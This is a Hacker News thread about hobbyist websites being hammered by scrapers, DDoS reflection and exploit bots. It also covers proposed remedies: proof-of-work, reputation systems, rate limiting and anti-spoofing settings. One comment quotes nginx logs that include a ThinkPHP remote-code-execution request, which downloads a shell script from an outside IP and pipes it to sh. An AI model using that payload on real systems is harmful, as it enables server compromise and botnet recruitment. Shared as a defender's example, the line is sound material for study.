[HN Gopher] The internet is no longer a safe haven
___________________________________________________________________
The internet is no longer a safe haven
Author : akyuu
Score : 218 points
Date : 2025-11-16 13:12 UTC (9 hours ago)
(HTM) web link (brainbaking.com)
(TXT) w3m dump (brainbaking.com)
| BinaryIgor wrote:
| I wonder why it is that we've seen such an increase in these
| automated scrapers and attacks of late (the past few years); is
| there better (open-source?) technology that enables it? Is it
| because hosting infrastructure is cheaper for the attackers
| too? Both? Something else?
|
| Maybe the long-term solution for such attacks is to hide most
| of the internet behind some kind of Proof of Work
| system/network, so that mostly humans get access to our
| websites, not machines.
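A hashcash-style proof of work, which is roughly what the suggestion above (and tools like Anubis, discussed elsewhere in this thread) amounts to, fits in a few lines of Python. This is a minimal sketch; the function names are illustrative, not any particular tool's API:

```python
import hashlib
import itertools

def solve(challenge: str, difficulty: int) -> int:
    """Search for a nonce such that sha256(challenge:nonce) starts
    with `difficulty` zero hex digits. Cheap for one human page
    view, expensive at scraper volumes."""
    prefix = "0" * difficulty
    for nonce in itertools.count():
        digest = hashlib.sha256(f"{challenge}:{nonce}".encode()).hexdigest()
        if digest.startswith(prefix):
            return nonce

def verify(challenge: str, nonce: int, difficulty: int) -> bool:
    """Verification is a single hash, so the server's cost stays
    tiny even under load."""
    digest = hashlib.sha256(f"{challenge}:{nonce}".encode()).hexdigest()
    return digest.startswith("0" * difficulty)
```

The asymmetry is the point: the client burns thousands of hashes per request while the server spends one, which shifts the cost onto whoever is sending the most requests.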
| trenchpilgrim wrote:
| Using AI you can write a naive scraper in minutes and there's
| now a market demand for cleaned up and structured data.
| marginalia_nu wrote:
| What's missing is effective international law enforcement. This
| is a legal problem first and foremost. As long as it's as easy
| as it is to get away with this stuff by just routing the
| traffic through a Russian or Singaporean node, it's going to
| keep happening. With international diplomacy going the way it
| has been, odds of that changing aren't fantastic.
|
| The web is really stuck between a rock and a hard place when it
| comes to this. Proof of work helps website owners, but makes
| life harder for all discovery tools and search engines.
|
| An independent standard for request signing and building some
| sort of reputation database for verified crawlers could be part
| of a solution, though that causes problems with websites
 | feeding crawlers different content than users, and does nothing
| to fix the Sybil attack problem.
| luckylion wrote:
| It's not necessarily going through a Russian or Singaporean
| node though, on the sites I'm responsible for, AWS, GCP,
| Azure are in the top 5 for attackers. It's just that they
| don't care _at all_ about that happening.
|
| I don't think you need world-wide law-enforcement, it'll be a
| big step ahead if you make owners & operators liable. You can
| limit exposure so nobody gets absolutely ruined, but anyone
| running wordpress 4.2 and getting their VPS abused for
| attacks currently has 0 incentive to change anything unless
| their website goes down. Give them a penalty of a few hundred
| dollars and suddenly they do. To keep things simple, collect
| from the hosters, they can then charge their customers, and
| suddenly they'll be interested in it as well, because they
| don't want to deal with that.
|
| The criminals are not held liable, and neither are their
| enablers. There's very little chance anything will change
| that way.
| mrweasel wrote:
   | The big cloud providers need to step up and take
   | responsibility. I understand that it can't be too easy to
   | do, but we really do need a way to contact e.g. AWS and
   | tell them to shut off a customer. I have no problem with
   | someone scraping our websites, but I do care when they
   | don't do so responsibly: slow down when we start responding
   | more slowly, don't assume you can just go full throttle,
   | crash our site, wait, and then do it again once we start
   | responding again.
|
| You're absolutely right: AWS, GCP, Azure and others, they
| do not care and especially AWS and GCP are massive
| enablers.
| ctoth wrote:
    | > we really do need a way to contact e.g. AWS and tell
    | them to shut off a customer.
|
| You realize you just described the infrastructure for far
| worse abuse than a misconfigured scraper, right?
| mrweasel wrote:
| I'm very aware of that, yes. There needs to be a good
| process, the current situation where AWS simply does not
| care, or doesn't know also isn't particularly good. One
| solution could be for victims to notify AWS that a number
     | of specified IPs are generating an excessive amount of
| traffic. An operator could then verify with AWS traffic
     | logs, notify the customer that they are causing issues and
| only after a failure to respond could the customer be
| shut down.
|
| You're not wrong that abuse would be a massive issue, but
| I'm on the other side of this and need Amazon to do
| something, anything.
| Aurornis wrote:
| > What's missing is effective international law enforcement.
|
| International law enforcement on the Internet would also
| subject you to the laws of other countries. It goes both
| ways.
|
| Having to comply with all of the speech laws and restrictions
| in other countries is not actually something you want.
| ocdtrekkie wrote:
| This is already kind of true with every global website, the
| idea of a single global internet is one of those fairy tale
   | fantasy things that maybe happened for a little bit before
| enough people used it. In many cases it isn't really ideal
| today.
| marginalia_nu wrote:
| We have historically solved this via treaties.
|
| If you want to trade with me, a country that exports
| software, let's agree to both criminalize software piracy.
|
| No reason why this can't be extended to DDoS attacks.
| beeflet wrote:
| I don't want governments to have this level of control
| over the internet. It seems like you are paving over a
| technological problem with the way the internet is
| designed by giving some institution a ton of power over
| the internet.
| marginalia_nu wrote:
| The alternative to governments stopping misbehavior is
| every website hiding behind Cloudflare or a small number
| of competitors, which is a situation that is far more
| susceptible to abuse than having a law that says you
| can't DDoS people even if you live in Singapore.
|
| It really can not be overstated how unsustainable the
| status quo is.
| armchairhacker wrote:
  | I don't think this can be solved legally without compromising
| anonymity. You can block unrecognized clients and punish the
| owners of clients that behave badly, but then, for example,
| an oppressive government can (physically) take over a
| subversive website and punish everyone who accesses it.
|
| Maybe pseudo-anonymity and "punishment" via reputation could
| work. Then an oppressive government with access to a
| subversive website (ignoring bad security, coordination with
| other hijacked sites, etc.) can only poison its clients'
| reputations, and (if reputation is tied to sites, who have
| their own reputations) only temporarily.
| ajuc wrote:
| > but then, for example, an oppressive government can
| (physically) take over a subversive website and punish
| everyone who accesses it.
|
| Already happens. Oppressive governments already punish
| people for visiting "wrong" websites. They already censor
| internet.
|
| There are no technological solutions to coordination
| problems. Ultimately, no matter what you invent, it's
| politics that will decide how it's used and by whom.
| BinaryIgor wrote:
| Good points; I would definitely vouch for an independent
| standard for request signing + some kind of decentralized
| reputation system. With international law enforcement, I
  | think there could be too many political issues for it not to
  | become corrupt.
| rkagerer wrote:
| _long-term solution_
|
| How about a reputation system?
|
| Attached to IP address is easiest to grok, but wouldn't work
| well since addresses lack affinity. OK, so we introduce an
| identifier that's persistent, and maybe a user can even port it
| between devices. Now it's bad for privacy. How about a way a
| client could prove their reputation is above some threshold
| without leaking any identifying information? And a
| decentralized way for the rest of the internet to influence
| their reputation (like when my server feels you're hammering
| it)?
|
| Do anti-DDoS intermediaries like Cloudflare basically catalog a
| spectrum of reputation at the ASN level (pushing anti-abuse
| onus to ISP's)?
|
| This is basically what happened to email/SMTP, for better or
| worse :-S.
| JimDabell wrote:
| Reputation plus privacy is probably unsolvable; the whole
| point of reputation is knowing what people are doing
| elsewhere. You don't need reputation, you need persistence.
| You don't need to know if they are behaving themselves
| elsewhere on the Internet as long as you can ban them once
| and not have them come back.
|
| Services need the ability to obtain an identifier that:
|
| - Belongs to exactly one real person.
|
| - That a person cannot own more than one of.
|
| - That is unique per-service.
|
| - That cannot be tied to a real-world identity.
|
| - That can be used by the person to optionally disclose
| attributes like whether they are an adult or not.
|
  | Services generally don't care about knowing your exact
  | identity, but being able to ban a person without having them
  | simply register a new account, and to stop people from
  | registering thousands of accounts, would go a long way
  | towards wiping out inauthentic and abusive behaviour.
|
| The ability to "reset" your identity is the underlying hole
| that enables a vast amount of abuse. It's possible to have
| persistent, pseudonymous access to the Internet without
| disclosing real-world identity. Being able to permanently ban
| abusers from a service would have a hugely positive effect on
| the Internet.
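The per-service and persistence properties on this list are the easy part: a keyed hash over the service name yields a stable pseudonym that cannot be correlated across services without the key. A minimal Python sketch, illustrative only; the harder properties, such as one identifier per real person, would additionally require a trusted issuer or a zero-knowledge credential scheme, which this does not provide:

```python
import hashlib
import hmac

def service_pseudonym(master_secret: bytes, service: str) -> str:
    """Derive a stable per-service pseudonym: the same secret
    always maps to the same ID for a given service (so a ban
    persists), while IDs for different services cannot be linked
    without the secret."""
    return hmac.new(master_secret, service.encode(), hashlib.sha256).hexdigest()
```

Because the derivation is deterministic, a banned user cannot "reset" their identity on that service without obtaining a new master secret, which is exactly the property an issuer would have to control.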
| jasonjayr wrote:
   | A digital "death penalty" is not a win for society unless
   | there is a fair way to atone for "crimes against your
   | digital identity".
|
   | It would be way too easy for the current regime (whoever
   | that happens to be) to criminalize random behaviors (Trans
| People? Atheists? Random nationality?) to ban their
| identity, and then they can't apply for jobs, get bus fare,
| purchase anything online, communicate with their lawyers,
| etc.
| JimDabell wrote:
| Describing _"I don't want to provide service to you and I
| should have the means of doing so"_ as a _"digital death
| penalty"_ is a tad hyperbolic, don't you think?
|
    | > It would be way too easy for the current regime
    | (whoever that happens to be) to criminalize random
| behaviors (Trans People? Atheists? Random nationality?)
| to ban their identity, and then they can't apply for
| jobs, get bus fare, purchase anything online, communicate
| with their lawyers, etc.
|
| Authoritarian regimes can already do that.
|
| I think perhaps you might've missed the fact that what I
| was suggesting was individual to each service:
|
| > Reputation plus privacy is probably unsolvable; the
| whole point of reputation is knowing what people are
| doing elsewhere. You don't need reputation, you need
| persistence. You don't need to know if they are behaving
| themselves elsewhere on the Internet as long as you can
| ban them once and not have them come back.
|
| I was saying _don't_ care about what people are doing
| elsewhere on the Internet. Just ban locally - but
| persistently.
| hombre_fatal wrote:
| If creating an identity has a cost, then why not allow
| people to own multiple identities? Might help on the
| privacy front and address the permadeath issue.
|
| Of course everything sounds plausible when speaking at such
| a high level.
| rkagerer wrote:
| I agree and think the ability to spin up new identities
| is crucial to any sort of successful reputation system
| (and reflects the realities of how both good and bad
| actors would use it). Think back to early internet when
| you wanted an identity in one community (e.g. forums
| about games you play) that was separate from another
| (e.g. banking). But it means those reputation identities
| need to take some investment (e.g. of time / contribution
| / whatever) to build, and can't become usefully trusted
| until reaching some threshold.
| nucleardog wrote:
| Yep, this is basically how I'd implement it if I needed
| to. Just tackle the problem in reverse here: Don't assume
| users are good and try and track which are bad, assume
| users are bad and track which are good.
|
| Look at the HN karma system--you start with limited
| features, and as you show yourself a good user, you get
| more features (and also trust/standing with the
| community). "Resetting" your identity only ever loses you
| something.
|
| Apply the same thing to a git host getting hammered or
| something--by default, users can't view the history
| online or something (can still clone), but as your
| identity establishes reputation (through positive
| interactions, or even just browsing in a non-bot-like
| manner), your reputation increases and you get rate-
| limited access or something.
|
| This is essentially where a lot of spam ended up--it used
| to be that your mail was deliverable until you acted
| poorly, then your reputation was bad and your
| deliverability went down. Now it more closely resembles
| this--your reputation is bad until you send enough good
| mail and take enough good actions (DKIM/SPF, etc) to show
| yourself as good.
|
| The issues really all stems from "resetting your identity
| gets you back in good standing". Once you take that out
| of the mix, you no longer need to worry much about
| limiting identities, tying them to the real world,
| ensuring they're persistent, or many of the other hard
| problems that come up.
| TylerE wrote:
| Because of course what this world needs is for the
| wealthy to have even more advantages over the normies.
| (Hint: If you're reading this, and think you're one of
| the wealthy ones, you aren't)
| lifty wrote:
| Zero knowledge proof constructs have the potential to solve
| these kind of privacy/reputation tradeoffs.
| gmuslera wrote:
  | It's ironic to use a reputation system for this.
|
| 20+ years ago there were mail blacklists that basically
| blocked residential IP blocks as there should not be servers
| trying to send normal mail from there. Now you must try the
| opposite, blacklist blocks where only servers and not end
  | users can come from, as there are potentially badly behaved
| scrapers in all major clouds and server hosting platforms.
|
  | But then there are residential proxies that pay end users to
  | route requests for misbehaving companies, so that mitigation
  | is leaky too.
| rkagerer wrote:
| It's interesting that along another axis, the inertia of
| the internet moved from a decentralized structure back
| toward something that resembles mainframes. I don't think
| those axes are orthogonal.
| hnthrowaway0315 wrote:
| I guess it is just because 1) They can, and 2) Everyone wants
| some data. I think it would be interesting if every website out
 | there starts to push out BS pages just for scrapers. Not sure
| how much extra cost it's going to take if a website puts up say
 | 50% BS pages that only scrapers can reach, or BS material with
| extremely small fonts hidden in regular pages that ordinary
| people cannot see.
| inerte wrote:
| Something like https://blog.cloudflare.com/ai-labyrinth/ ?
| Vegenoid wrote:
| I'm pretty sure it is the commercial demand for data from AI
| companies. It is certainly the popular conception among
| sysadmins that it is AI companies who are responsible for the
| wave of scrapers over the past few years, and I see no
| compelling alternative.
| embedding-shape wrote:
| > and I see no compelling alternative.
|
| Another potential cause: It's way easier for pretty much any
| person connected to the internet to "create" their own
  | automation software by using LLMs. I'd wager that even the
| less smart LLMs could handle "Create a program that checks
| this website every second for any product updates on all
| pages" and give enough instructions for the average computer
| user to be able to run it without thinking or considering
| much.
|
| Multiply this by every person with access to an LLM who wants
  | to "do X with website Y" and you'll get an order-of-magnitude
  | increase in traffic across the internet. This has been
  | possible since what, 2023 sometime? Not sure if the patterns
  | would line up, but just another guess for the cause(s).
| EGreg wrote:
| Why? It's because of AI. It enables attacks at scale. It
| enables more people to attack, who previously couldn't. And so
| on.
|
| It's very explainable. And somehow, like clockwork, there are
| always comments to say "there is nothing new, the Internet has
| always been like this since the 80s".
|
| You know, part of me wants to see AI proliferate into more and
| more areas, just so these people will finally wake up
| eventually and understand there is a huge difference when AI
| does it. When they are relentlessly bombarded with realistic
| phone calls from random numbers, with friends and family
| members calling about the latest hoax and deepfake, when their
| own specific reputation is constantly attacked and destroyed by
| 1000 cuts not just online but in their own trusted circles, and
| they have to put out fires and play whack-a-mole with an
| advanced persistent threat that only grows larger and always
| comes from new sources, anonymous and not.
|
| And this is all before bot swarms that can coordinate and plan
| long-term, targeting specific communities and individuals.
|
| And this is all before humanoid robots and drones proliferate.
|
| Just try to fast-forward to when human communities online and
| offline are constantly infiltrated by bots and drones and
| sleeper agents, playing nice for a long time and amassing karma
| / reputation / connections / trust / whatever until finally
| doing a coordinated attack.
|
| Honestly, people just don't seem to get it until it's too late.
| Same with ecosystem destruction -- tons of people keep
| strawmanning it as mere temperature shifts, even while
| ecosystems around the world get destroyed. Kelp forests.
| Rainforests. Coral reefs. Fish. Insects. And they're like "haha
| global warming by 3 degrees big deal. Temperature has always
| changed on the planet." (Sound familiar?)
|
| Look, I don't actually want any of this to happen. But if they
| could somehow experience the movie _It's a Wonderful Life_ or
| meet the _Ghost of Christmas Yet to Come_ , I'd wholeheartedly
| want every denier to have that experience. (In fact, a
| dedicated attacker can already give them a taste of this with
| current technology. I am sure it will become a decentralized
| service soon :-( )
| hshdhdhj4444 wrote:
| Our tech overlords understand AI, especially any form of AGI,
| will basically be the end of humanity. That's why they're
| entirely focused on being the first and amassing as much
| wealth in the meanwhile, giving up on any sort of
| consideration whether they're doing good for people or not.
| jchw wrote:
| Anubis is definitely playing the cat-and-mouse game to some
| extent, but I like what it does because it forces bots to either
| identify themselves as such or face challenges.
|
| That said, we can likely do better. Cloudflare does good in part
| because Cloudflare runs so much traffic, so they have a lot of
| data across the internet. Smaller operators just don't get enough
| traffic to really deal with banning abusive IPs without banning
| entire ranges indefinitely, which is not ideal. I hope to see a
| solution
| like Crowdsec where reputation data can be crowdsourced to block
| known bad bots (at least for a while since they are likely
| borrowing IPs) while using low complexity (potentially JS-free)
| challenges for IPs with no bad reputation. It's probably too much
| to ask for Anubis upstream which is probably already too busy
| dealing with the challenges of what it already does at the scale
| it is operating, but it does leave some room for further
| innovation for whoever wants to go for it.
|
| In my opinion there is at least no reason why it is not plausible
| to have a drop-in solution that can mostly resolve these problems
| and make it easier for hobbyists to run services again.
| gjsman-1000 wrote:
| The problem with anything, _anything_ , without a centralized
| authority, is that friction overwhelms inertia. Bad actors exist
| and have no mercy, while good people downplay them until it's too
| late. Entropy always wins. Misguided people assume the problem is
| _powerful people,_ when the problem is actually what the
| _powerful people use their authority to do_ , as powerful people
| will always exist. Accepting that and maintaining oversight is
| the historically successful norm; abolishing them has always
| failed.
|
| As such, I don't agree with the author of this post about
| trying to resist Cloudflare for moral reasons. A decentralized
| system where everyone plays nice and mostly cooperates, does not
| exist any more than a country without a government where everyone
| plays nice and mostly cooperates. It's wishful thinking. We
| already tried this with Email, and we're back to gatekeepers.
| Pretending the web will be different is ahistorical.
| pixl97 wrote:
| The internet has made the world small and that's a problem.
| Nation states typically had a limited range of broadcasting
| their authority in the more distant past. A bad ruler couldn't
| rule the entire world, nor could they cause trouble with the
| entire world. From nukes to the interconnected web the worst of
 | us with power can affect everyone else.
| martin-t wrote:
| Power is a spectrum. Power differentials will always exist but
| we can absolutely strive to make them smaller and smaller.
|
| 1) Most of the civilized world no longer has hereditary
| dictators (such as "kings"). Because they were removed from
| power by the people and the power was distributed among many
| individuals. It works because malicious (anti-social)
| individuals have trouble working together. And yes, oversight
| helps.
|
| But it's a spectrum and we absolutely can and should move the
| needle towards more oversight and more power distribution.
|
| 2) Corporate power structures are still authoritarian. We can
| change that too.
| time4tea wrote:
| Had to ban RU, CN, SG, and KR just cos of the volume of spam. The
| random referer headers have recently become a problem.
|
| This is particularly annoying as knowing where people come from
| is important.
|
| It's just another reason to give up making stuff, and give in to
| the FAANG and the AI enshittification.
|
| :-(
| mrweasel wrote:
 | If you only care about regular users I'd advise banning all
| known datacenters, Browserbase, China and Brazil.
| worthless-trash wrote:
  | I also banned the Middle East. Logs actually reflected real
  | users, cost dropped, and my mental health improved.
|
| Win Win.
| mrweasel wrote:
| If you know that you don't have customers or users in the
| area, or very few, then go for it.
|
   | I worked in e-commerce previously; we reduced fraud to
| almost zero by banning non-local cards. It affected a few
| customers that had international credit cards, but not
| enough to justify dealing with the fraud. Sometimes you
| just need to limit your attack surface.
| mberning wrote:
| The internet is over. If we want to recapture the magic of the
| earlier times we are going to have to invent something new.
| fithisux wrote:
| going back to Gopher?
| itintheory wrote:
| Gopher still requires the Internet. I know it's pretty common
| to conflate "the Internet" with "the World Wide Web", but
| there are actually other protocols out there (like Gopher).
| fithisux wrote:
| I don't see a solution then.
| groundzeros2015 wrote:
| Why would that help?
| pixl97 wrote:
 | There is no "something new". Anything we invent will be able
 | to be taken over by complex bots. Welcome to the future shock
 | where humans aren't at the top of their domain.
| 9rx wrote:
| The magical times in the past have always been marked with
| being able to be part of an "exclusive club" that takes
| something from nothing to changing the world.
|
| Because of the internet, magical times can never be had again.
| You can invent something new, but as soon as anyone finds out
| about it, everyone now finds out about it. The "exclusive club"
| period is no more.
| martin-t wrote:
| > magical times can never be had again
|
| Yes, they can. But we need to admit to ourselves that people
| are not equal. Not just in terms of skill but in terms of
| morality and quality of character. And that some people are
| best kept out.
|
| Corporations, being amoral, should also be kept out.
|
| ---
|
| The old internet was the way it was because of gate keeping -
| the people on it were selected through technical skill being
| required. Generally people who are builder types are more
| pro-social than redistributor types.
|
| Any time I've been in a community which felt good, it was
| full of people who enjoyed building stuff.
|
| Any time such a community died, it was because people who
| crave power and status took it over.
| dw_arthur wrote:
| Gatekeeping and exclusion are going to have to make a
| comeback if we want to have a thriving culture again.
| Sometimes people need to be told their art, taste, or
| morals are lacking.
| willis936 wrote:
| Third spaces and the free time to explore them?
|
| No no, that doesn't maximize shareholder value.
| renewiltord wrote:
| Haha, you could host on Gemini instead of HTTP. You'd simulate
| the old internet in that only enthusiasts would come!
| basscomm wrote:
 | There's already an Internet2; do we need to invent Internet3?
| bpt3 wrote:
| The internet hasn't been a safe haven since the 80s, or maybe
| earlier (that was before my time, and it's never been one since I
| got online in the early 90s).
|
| The only real solution is to implement some sort of identity
| management system, but that has so many issues that make it a
| non-starter.
| lotsofpulp wrote:
| > The only real solution is to implement some sort of identity
| management system, but that has so many issues that make it a
| non-starter.
|
| Apple and Alphabet seem positioned to easily enable it.
|
| https://www.apple.com/newsroom/2025/11/apple-introduces-digi...
| JSR_FDED wrote:
| I don't get it. That link refers to Apple letting you put
| your passport and drivers license info in the wallet on your
| phone.
| Astronaut3315 wrote:
| Apple's Wallet app presents this feature as being for "age
| and identity verification in apps, online and in person".
| pixl97 wrote:
  | Alphabet, the company that bans people for opaque reasons
  | with no recourse? Good idea. Maybe tech should not be in
  | charge of digital identification.
| lotsofpulp wrote:
| The governments like it that way. They want banks and tech
| companies to be intermediaries that are more difficult to
| hold accountable, because they can just say "we didn't feel
| like doing business with this person".
| cosmicgadget wrote:
| Was it a safe haven or was it less safe but simply an
| unprofitable target?
| unreal37 wrote:
| Given that the World Wide Web was invented in 1989... are you
| saying that the Internet was safer when only FTP and Usenet
| existed?
| qwertox wrote:
| Since I moved my DNS records to Cloudflare (that is: nameserver
| is now the one from Cloudflare), I get tons of odd connections,
| most notably SYN packets to either 443 or 22, which never respond
| back after the SYN-ACK. They ping me once a second on average,
| distributing the IPs over a /24 network.
|
| I really don't understand why they do this, and it mostly comes
| from shady origins, like VPS game server hosters from Brazil and
| so on.
|
| I'm at the point where I capture all the traffic and look for
| SYN packets, check the RDAP records for them to decide if I then
| drop the entire subnets of that organization, whitelisting things
| like Google.
|
| Digital Ocean is notoriously a source of bad traffic, they just
| don't care at all.
| kzemek wrote:
| These are spoofed packets for SYNACK reflection attacks. Your
| response traffic goes to the victim, and since network stacks
| are usually configured to retry SYNACK a few times, they also
| get amplification out of it
| sva_ wrote:
| > like vps game server hoster from Brazil and so on.
|
| Probably someone DDoSing a Minecraft server or something.
|
| People in games do this where they DDoS each other. You can get
| access to a DDoS panel for as little as $5 a month.
|
| Some providers allow for spoofing the src ip, that's how they
| do these reflection attacks. So you're not actually dropping
| the sender of these packets, but the victims.
|
 | Consider turning the reverse path filter to strict as a basic
 | anti-spoofing method and see if it helps:
       net.ipv4.conf.all.rp_filter = 1
       net.ipv4.conf.default.rp_filter = 1
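To make the strict setting survive reboots, the same keys can go in a sysctl drop-in file, loaded with `sysctl --system`. The filename here is illustrative; the path is the usual one on systemd-based distributions:

```
# /etc/sysctl.d/90-rp-filter.conf
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
```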
| qwertox wrote:
| Thanks, it never came to my mind.
| cute_boi wrote:
   | I believe the kernel should make this behavior the default.
| ranger_danger wrote:
| > Digital Ocean is notoriously a source of bad traffic, they
| just don't care at all.
|
| Why should it be an ISP's job to police what their users can
 | and can't do? I _really_ don't think you want service
| providers to start moderating things.
|
| Does your electricity company ban the use of red light bulbs?
| Would everyone be ok with such restrictions?
| selectodude wrote:
| No but your electricity company will absolutely rat you out
| if your electricity usage skyrockets and the police will pop
| by to see if you're running a grow op or something.
| esseph wrote:
| Not anymore (depending on the state, and not since LED grow
| lights).
| threeducks wrote:
| > Fail2ban was struggling to keep up: it ingests the Nginx
| > access.log file to apply its rules but if the files keep on
| > exploding... [...] But I don't want to fiddle with even
| > more moving components and configuration
|
| You can configure nginx to do rate-limiting directly. Blog post
| with more details:
| https://blog.nginx.org/blog/rate-limiting-nginx
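A minimal sketch of that nginx-level rate limiting; the zone name and the numbers are illustrative, while `limit_req_zone`, `limit_req`, and `limit_req_status` are the actual directives of ngx_http_limit_req_module. Both directives belong inside the `http` context:

```nginx
# one shared 10 MB zone of per-IP state, allowing 5 requests/second
limit_req_zone $binary_remote_addr zone=perip:10m rate=5r/s;

server {
    listen 80;
    location / {
        # absorb short bursts, reject the rest with 429
        limit_req zone=perip burst=10 nodelay;
        limit_req_status 429;
    }
}
```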
| embedding-shape wrote:
| > The internet is no longer a safe haven for software hobbyists
|
| Maybe I've just had bad luck, but since I started hosting my own
| websites back around 2005 or so, my servers have always been
| attacked basically from the moment they come online. Even more so
| when you attach any sort of DNS name to it, especially when you
| use TLS and the certificates, guessing because they end up in a
| big index that is easily accessible (the "transparency logs").
| Once you start sharing your website, it again triggers an
| avalanche of bad traffic, and the final boss is when you piss
| off some organization and (I'm assuming) they hire some bad
| actor to try to take you offline.
|
| Dealing with crawlers, botnets, automation gone wrong, pissed-off
| humans and so on has been almost a yearly thing for me since I
| started deploying stuff to the public internet. But again, maybe
| I've had bad luck? Hosted stuff across a wide range of providers,
| and seems to happen across all of them.
| zwnow wrote:
| My first ever deployed project was breached on day 1 with my
| database dropped and a ransom note in there. Was a beginner
| mistake by me that allowed this, but it's pretty discouraging.
 | It's not the internet that sucks, it's people that suck.
| mattmaroon wrote:
| Well I guess at least on day 1 you didn't have much to lose!
| zwnow wrote:
   | It's a personal blog so even if data was lost it would've
| been just posts that nobody reads. Certainly not worth the
| 0.00054 BTC they wanted
| timeinput wrote:
| more like a zero day on day zero.
| aftbit wrote:
| My stuff used to get popped daily. A janky PHP guestbook I
| wrote just to learn back in the early 2000s? No HTML injection
 | protection & someone turned my site into a spammy XSS hack within
| days. A WordPress installation I fell behind on patching?
| Turned into SEO spam in hours. A redis instance I was using
| just to learn some of their data structures that got
| accidentally exposed to the web? Used to root my computer and
| install a botnet RAT. This was all before 2020.
|
| I never felt this made the internet "unsafe". Instead, it just
| reminded me how I messed up. Every time, I learned how to do
| better, and I added more guardrails. I haven't gotten popped
| that obviously in a long time, but that's probably because I've
| acted to minimize my public surface area, used star-certs to
| avoid being in the cert logs, added basic auth whenever I can,
| and generally refused to _trust_ software that's exposed to the
| web. It's not unsafe if you take precautions, have backups, and
| are careful about what you install.
|
| If you want to see unsafe, look at how someone who doesn't
| understand tech tries to interact with it. Downloading any
| random driver or exe to fix a problem, installing apps when a
| website would do, giving Facebook or Tiktok all of their
| information and access without recognizing that just maybe
| these multi-billion-dollar companies who give away all of their
| services don't have your best interests in mind.
| BolexNOLA wrote:
| I really like how you take these situations and turn them
| into learning moments, but ultimately what you're describing
| still sounds like an incredibly hostile space. Like yeah
| everyone should be a defensive driver on the road, but we
| still acknowledge that other people need to follow the rules
| instead of forcing us to be defensive drivers all the time.
| zelphirkalt wrote:
| Hosting a WP install with any number of third-party plugins
| written by script kiddies, without constant vigilance and
| keeping things up to date, is a recipe for disaster. This makes it a
| job guarantee. Hapless people paying for someone to set up a
| hopelessly over-complicated WP setup, paying for lots of
| plugins, and constant upkeep. Basically, that ecosystem feeds
| an entire community of "web developers" by pushing badly
| written software, that then endlessly needs to be patched and
| maintained. Then the feature creep sets in and plugins stray
| from the path of doing one thing well, until even WP instance
| maintainers deem them too bloated and look for a simpler one.
| Then the cycle begins anew.
| fragmede wrote:
| The worst feeling I ever had was from exposing a samba share
| to the Internet in the 2000s and having that get popped and
| my dad's company getting hacked because of the service I set
| up for him.
| heresie-dabord wrote:
| > my servers have always been attacked
|
| I believe the correct verb is _monetised_.
| BinaryIgor wrote:
| I have very similar experience. In my Nginx logs, I see things
| like that on a regular basis:
|
| 79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET
| /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555
| "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm"
| "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
| (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ...
| 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00
| \xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x
| 8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \x
| D0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x
| 88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-"
| 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00
| \xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x
| 13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE
| \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\
| x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
|
| or:
|
| "192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/in
| dex.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_
| user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%
| 3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-
| %20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20h
| ttp%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301
| 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
|
| These are just some examples, but they happen pretty much daily
| :(
| hdgvhicv wrote:
| I remember watching the code red signatures in my space logs on
| my desktop back in 2001
| NoboruWataya wrote:
| I have a personal domain that I have no reason to believe any
| other human visits. I selfhost a few services that only I use
| but that I expose to the internet so I can access them from
| anywhere conveniently and without having to expose my home
| network. Still I get a constant torrent of malicious traffic,
| just bots trying to exploit known vulnerabilities (loads of
| them are clearly targeting WordPress, for example, even though
| I have never used WordPress). And it has been that way for
| years. I remember the first time I read my access logs I had a
| heart attack, but it's just the way it is.
| timeinput wrote:
| and it has been that way for a long time. Hosting a service
| on the internet means someone is *constantly* knocking at
| your door. It would be unimaginable if every few 10-1000s of
| milliseconds someone was trying a key in my front door, but
| that's just what it is with an open port on the internet.
| sshine wrote:
| I recently provisioned a VPS for educational purposes. As
| part of teaching public/private network interfaces in
| Docker, and as a debug tool, I run netstat pretty early on.
|
| Minutes after coming into existence, I have half a dozen
| connections to sshd from Chinese IP addresses.
|
| That teaches the use of SSH keys.
| toyg wrote:
| Just put sshd on a nonstandard port, and 95% of the
| traffic goes away. Vandals can't be bothered with port-
| scanning, probably because the risk of getting banned
| before the scan is even complete is too high.
|
| But I agree that keys are not optional anymore.
| esseph wrote:
| Fronting with ssh is not as secure as you could be.
|
| Wireguard, tailscale, etc instead, THEN use ssh keys
| (with password on them mind you, then you have 2fa -
| something you have, and something you know).
| mbreese wrote:
| I've often thought about writing a script to use those bot
| attacks as a bit of a honey pot. The idea would be if someone
| is viewing a site with a brand new SSL certificate, that it
| can't be legitimate traffic, so just block that ip/subnet
| outright at the firewall. Especially if they are looking for
| specific URLs like Wordpress installations. There are a few
| good actors that also hit sites quickly (ex: I've seen Bing
| indexing in that first wave of hits), but those are the
| exception.
|
| Sadly, like many people, I just deal with the traffic as
